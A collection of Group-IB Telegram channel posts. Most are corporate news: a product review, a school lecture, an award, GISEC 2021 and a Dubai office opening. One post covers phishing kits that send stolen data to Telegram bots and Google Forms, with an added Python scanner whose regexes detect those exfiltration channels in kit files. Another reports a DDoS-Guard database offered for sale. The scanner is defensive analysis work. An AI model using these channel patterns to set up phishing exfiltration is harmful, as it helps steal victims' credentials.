Group-IB – Telegram
Your daily source of cybersecurity news brought to you by Group-IB, one of the global industry leaders.
#phishing #bots
Telegram bots and Google Forms make an appearance in phishing schemes

🐠A phishing kit is a toolset that helps create and operate phishing web pages that mimic a specific company or even several at once. Such kits are usually sold on underground forums and are a way to effortlessly build infrastructure for large-scale phishing campaigns. By extracting the kits, cybersecurity analysts can identify the mechanism used to carry out the phishing attack and figure out where the stolen data is sent. In addition, a thorough examination of phishing kits helps analysts detect digital traces that might lead to the developers of the phishing kit.

🐠Group-IB specialists found that cybercriminals are beginning to use legitimate services such as Google Forms and Telegram to obtain user data stolen on phishing websites. For the criminals this approach is safer and delivers the information immediately, whereas previously they used more complex tools such as dedicated e-mail accounts, which they first had to log in to in order to obtain the data.

🐠In addition, ready-to-go platforms that automate phishing and are available on the darknet have Telegram bots at their core, with an admin panel that is used to manage the entire process of the phishing attack and keep the financial records linked to it. Such platforms are distributed under the cybercrime-as-a-service model, which subsequently leads to more groups conducting attacks. They also widen the scope of cybercriminal activity.

Check out the full story on our website if you are curious to dive into our analysis and learn about the ways to protect your business from phishing attacks.
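
An added example (not Group-IB's code): a small Python pass over the files of an extracted kit that reports which of the channels named above (Telegram bot, Google Form, e-mail) the stolen data is sent to, and which indicator to pivot on. The file names, placeholder token, form ID and address are constructed, and the three regexes are illustrative assumptions rather than a complete signature set.

```python
import re

# Channel name -> regex whose first group is the indicator worth pivoting on.
# Illustrative patterns only (assumption), not a complete signature set.
EXFIL_PATTERNS = {
    "telegram_bot": re.compile(r"api\.telegram\.org/bot(\d+):[\w-]+/", re.I),
    "google_form": re.compile(
        r"docs\.google\.com/forms/(?:u/\d+/)?d/(?:e/)?([\w-]+)/formResponse", re.I),
    "email_drop": re.compile(r"([\w.+-]+@[\w-]+(?:\.[\w-]+)+)"),
}

# Constructed sample: relative path -> source excerpt from a hypothetical kit.
SAMPLE_KIT = {
    "login/post.php": '$u = "https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/sendMessage";',
    "verify/send.php": "$url = 'https://docs.google.com/forms/d/e/PLACEHOLDER_FORM_ID/formResponse';",
    "old/mailer.php": '$to = "collector@example.invalid"; mail($to, $subject, $body);',
    "assets/style.css": "body { font-family: sans-serif; }",
}


def find_exfil_channels(kit_files):
    """Return sorted (path, channel, indicator) tuples for each exfiltration hint."""
    hits = set()
    for path, source in kit_files.items():
        for channel, pattern in EXFIL_PATTERNS.items():
            for match in pattern.finditer(source):
                hits.add((path, channel, match.group(1)))
    return sorted(hits)


def summarize(hits):
    """Group indicators by channel so a drop reused across kits stands out."""
    summary = {}
    for _path, channel, indicator in hits:
        summary.setdefault(channel, set()).add(indicator)
    return {channel: sorted(values) for channel, values in summary.items()}


if __name__ == "__main__":
    for path, channel, indicator in find_exfil_channels(SAMPLE_KIT):
        print(f"{path}: {channel} -> {indicator}")
```

The Telegram pattern captures only the numeric bot ID, which stays stable when the operator rotates the secret part of the token.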
#GIB_THF #HelpNetSecurity
Threat Hunting Framework: Help Net Security Review

🔹Help Net Security reviewed and tested our Threat Hunting Framework and published their conclusions in their new article.

🔹Make sure to give it a read if you are curious to know more about the testing process, the framework’s components and the ultimate conclusion.

🔹Group-IB Threat Hunting Framework is a system for IT and OT networks that protects against unknown threats and targeted attacks, hunts for threats both within and outside the protected organization’s perimeter, and helps investigate and respond to cybersecurity incidents and minimize their impact.
#education #daltonschool #amsterdam
Group-IB European team shares the cybersecurity basics and valuable tips with school students in Amsterdam!

🎓Dalton schools are becoming more popular around the world these days, but what exactly are they all about? Generally speaking, students bear a high level of independence as well as responsibility. Rather than constantly monitoring their progress, teachers simply outline a deadline for a project or an assignment. They can act as coaches, providing guidance upon request, but they never interfere before the deadline unless asked to do so. This is very similar to what many of us experience at work and it’s a great way to prepare for adult life!

🏡Located in the Nieuw-West district of Amsterdam, Caland Lyceum is a perfect example of a Dalton School.

👨‍💼Our team, led by Artyom Artyomov, Head of Digital Forensics Laboratory in Europe, gladly accepted the invitation to stop by for a lecture. Artyom touched on a number of interesting topics, such as:

🔹cybercrime
🔹current threats
🔹how to protect yourself online
🔹what exactly is digital forensics

We knew we had ended up in the right place straight away! All of the students were extremely interested in cybersecurity and listened closely to Artyom for more than an hour. This was followed by a series of straight-to-the-point questions, including:

🔹how did Artyom end up in cybersecurity
🔹what’s the biggest case in his career
🔹how to protect yourself online when using a phone
🔹how effective antiviruses are these days
🔹what are the latest and most effective solutions to protect yourself from cybercriminals

💪We were very happy to encounter an audience so passionate about the topics we brought in and expand their knowledge on cybersecurity!

🌎Group-IB is excited to keep participating in education projects around the world, improving our common digital environment.
#interview #award #sbr
An exclusive interview with Shafique Dawood, Group-IB Head of Sales and Business Development in APAC.

Last month, we were very excited and honored to receive the SBR Technology Excellence 2021 award for our Threat Intelligence & Attribution system. Shafique Dawood, Group-IB Head of Sales and Business Development in APAC, was proud to accept the award in person as well as stop by for an interview discussing:

🔹What exactly is our Threat Intelligence & Attribution system and its distinguishing features
🔹What threats businesses can counter with the help of our Threat Intelligence & Attribution system
🔹Some of the international counter cybercrime operations Group-IB took part in
🔹Ransomware and how Group-IB expertise can play a vital role in countering the modern plague

Click here for more information about Group-IB Threat Intelligence & Attribution!
#GISEC2021 #productshowcase
Group-IB is proud to take part in GISEC 2021!

Group-IB is very excited to take part in the largest showcase of cybersecurity solutions in the Middle East.

👨‍💼 Our Chief Technical Officer Dmitry Volkov will be taking over the X-lab stage on Monday at 2:30PM, bringing along an exclusive showcase of Group-IB Threat Intelligence & Attribution system as well as our Threat Hunting Framework.

➡️ With cybercriminals constantly improving their methods, simple detection is not enough. It is important to predict their probable courses of action and stay one step ahead by searching for threats and possible signs of an attack in the infrastructure.

➡️ Group-IB is here to step in with a number of essential solutions, such as:

🔹Group-IB Threat Intelligence & Attribution

🔹Systems for threat detection and threat hunting within and beyond the protected perimeter

Join Dmitry Volkov on Monday to learn more and don't forget to visit our stand # SS1-C12 for even more information about Group-IB innovative products, including our Fraud Hunting Platform and Digital Risk Protection.

📊 Make sure to stop by for some exciting cases and scenarios. We can’t wait to see you!
#newoffice #groupib
Group-IB launches regional HQ in Dubai!

🌇 We have officially opened the Group-IB Middle East & Africa Threat Intelligence & Research Center in Dubai. This is a critical milestone toward achieving the strategic goal of building the first ever decentralized global cybersecurity company with fully operational R&D centers in the key financial hubs!

👨‍💼 The grand opening, held at the Habtoor Palace Dubai, was attended by representatives of the local financial organizations, government institutions, and the guest of honor, Mr. Craig Jones, INTERPOL Cybercrime director.

💪 The office would operate not just as a sales hub but also as a full-scale regional HQ, offering all core technological competencies and bringing with it the top skills that are found across its global HQ in Singapore and other offices. The new center enables the local community to leverage Group-IB’s in-depth knowledge of criminal schemes and close collaboration with international law enforcement and cyber police forces worldwide. The company’s battle-tested experts carried out more than 1,200 successful investigations over 18 years around the world, enriching Group-IB’s technology ecosystem with first-hand understanding of intrusion tactics used in the most sophisticated cyberattacks.

💬“Zero tolerance to cybercriminals has brought us to the forefront of the global fight against online crime,” said Ilya Sachkov, Group-IB CEO and founder. “Dubai is a perfect place to carry on this mission together with local institutions and international law enforcement. As part of our contribution to building a vibrant cybersecurity ecosystem in the UAE, we plan to develop world-class research, monitoring, incident detection and response capabilities here in Dubai and adapt them to the needs of the market”, he added.
#GIB_TIA
Group-IB has discovered a database allegedly belonging to a bulletproof hosting provider DDoS-Guard posted for sale on a cybercrime forum.

🔹The database supposedly contains information about DDoS-Guard’s customers, including their names, IP addresses, and payment information. In addition to the database, the threat actor claims to have the source code of DDoS-Guard’s infrastructure. The seller is currently auctioning the entire set at a starting price of $350,000.

🔹DDoS-Guard is a Russian online infrastructure services provider that in January 2021 helped Parler, a social media app, to return online after it had been refused web hosting services on the AWS platform. DDoS-Guard also provides computing capacities and obstructs the identification of website owners of hundreds of shady resources that are engaged in the sale of illicit goods, gambling, and copyright infringements.

🔹Group-IB Threat Intelligence & Attribution system detected the listing posted on May 26 on exploit[.]in, a popular hacker forum.

“Initially, the threat actor was auctioning off the lot with a starting price of $500,000. Shortly after, the amount was reduced to $350,000,” says Oleg Dyorov, Threat Intelligence analyst at Group-IB. “The threat actor didn’t provide a sample of the database, which makes it impossible to verify the authenticity of the reported stolen database and the source code. The seller registered this account on exploit[.]in in January 2021 and has been looking to buy access to different corporate networks ever since. It is only the second time that they are trying to sell data on the forum. Despite the regular activity, the threat actor has no reputation on the forum and has made no deposits yet.”

🔹According to Group-IB Threat Intelligence & Attribution system, this user previously had an account on exploit[.]in but was banned by the forum administrators as he refused to use the escrow service.
#Dubai #GISEC2021
The last couple of days in Dubai have been absolutely incredible!

After a spectacular launch of our new Middle East & Africa HQ, we decided to stay a while longer and take part in GISEC2021, the largest showcase of cybersecurity solutions in the region.

👨‍💼 The Group-IB squad, led by our CTO Dmitry Volkov, presented the full range of our products, as well as their features and innovative capabilities, including:

👉Network infrastructure protection
👉Adversary-centric detection of targeted attacks and unknown threats for IT and OT environments
👉Digital identity protection and fraud prevention in real time
👉 Mitigation of external digital risks to the company’s intellectual property and brand

⭐️ We were honored to receive so many visitors at our stand and even more excited to see so many people attend Dmitry’s speech at the X-Lab stage.

🌎 We are proud to have expanded our presence in the region. The opening of our brand-new office as well as our participation in GISEC2021 was an amazing experience and one of the bright highlights in Group-IB history!

🌇 Thank you so much to Dubai residents, visitors and everyone involved for making this possible and for an incredibly warm welcome!